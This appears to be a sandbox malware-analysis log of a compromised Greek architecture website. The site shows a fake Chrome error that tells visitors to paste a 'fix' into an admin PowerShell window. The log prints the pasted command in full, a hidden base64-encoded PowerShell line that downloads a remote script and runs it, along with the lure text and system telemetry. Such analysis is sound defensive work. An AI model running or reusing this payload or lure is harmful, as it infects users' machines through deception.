      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49707 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49882 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49883 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49884 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49885 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49886 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49888 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49889 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:49887 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49892 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49894 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49895 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49896 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49900 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49901 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 150.171.85.254:443 -> 192.168.2.16:49904 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.213.254:443 -> 192.168.2.16:49906 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.16:49907 version: TLS 1.2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
      Source: classification engineClassification label: mal88.troj.evad.win@25/109@35/203
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_762381681
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvuyvjag.n1g.ps1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1980,i,4396760410683812038,16617710152799470226,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.thearchiterra.gr/"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1980,i,4396760410683812038,16617710152799470226,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA="
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep RemoteSigned -w 1 -enc "JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA="
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

      Persistence and Installation Behavior

      barindex
      Source: Chrome DOM: 1.6OCR Text: architerra HOME SERVICES PROJECTS THE TEAM CONTACT Google Chrome Something went wrong while displaying this webpage. There was an error during the latest update of browser version, causing some web pages to malfunction. Follow these instructions to resolve the issue: 1. Click the 'Copy fixi button below. in 2. Right-click on the Windows icon 3. Select 'Windows PowerShell (Admin)i 4. Right-click within the open terminal window. 5. Wait for the update to complete, then refresh the page. Copy fix Close 01 03 05 KLEEMANN SHOWROOM RAYCAP S.A. CAVE HOUSE IN KEA HANCAR SUMMER HOUSE IN NAFPLIO Housing
      Source: Chrome DOM: 1.3OCR Text: architerra HOME SERVICES PROJECTS THE TEAM CONTACT Google Chrome Something went wrong while displaying this webpage. There was an error during the latest update of browser version, causing some web pages to malfunction. Follow these instructions to resolve the issue: 1. Click the 'Copy fix' button below. 2. Right-click on the Windows icon 3. Select 'Windows PowerShell (Admin)' 4. Right-click within the open terminal window. 5. Wait for the update to complete, then refresh the page. Copy fix Close 02 KLEEMANN SHOWROOM RAYCAP S.A. CAVE HOUSE IN KEA HANCAR SUMMER HOUSE IN NAFPLIO /nc/ustrja/
      Source: screenshotOCR Text: e about:blank a wv,w.thearchiterra.gr thearchfr C thearchiterra.gr architerra HOME SERVICES PROJECTS THE TEAM CONTACT Google Chrome Something went wrong while displaying this webpage. There was an error during the latest update of browser version, causing some web pages to malfunction. Follow these instructions to resolve the issue: 1. Click the 'Copy fixi button below. 2. Right-click on the Windows icon 3. Select 'Windows PowerShell (Admin)i 4. Right-click within the open terminal window. 5. Wait for the update to complete, then refresh the page. Copy fix Close RAYCAP S.A. CAVE HOUSE IN KEA SUMMER HOUSE IN KLEEMANN SHOWROOM HANCAR NAFPLIO industrje/ ENG p Type here to search SG 31/10/2024
      Source: Chrome DOM: 1.5OCR Text: architerra HOME SERVICES PROJECTS THE TEAM CONTACT Google Chrome Something went wrong while displaying this webpage. There was an error during the latest update of browser version, causing some web pages to malfunction. Follow these instructions to resolve the issue: 1. Click the 'Copy fixi button below. 2. Right-click on the Windows icon 3. Select 'Windows PowerShell (Admin)i 4. Right-click within the open terminal window. 5. Wait for the update to complete, then refresh the page. Copy fix Close 01 04 05 KLEEMANN SHOWROOM RAYCAP S.A. CAVE HOUSE IN KEA HANCAR SUMMER HOUSE IN NAFPLIO /nc/ustr/3,
      Source: https://thearchiterra.gr/LLM: Page contains button: 'VIEW MORE' Source: '1.1.pages.csv'
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
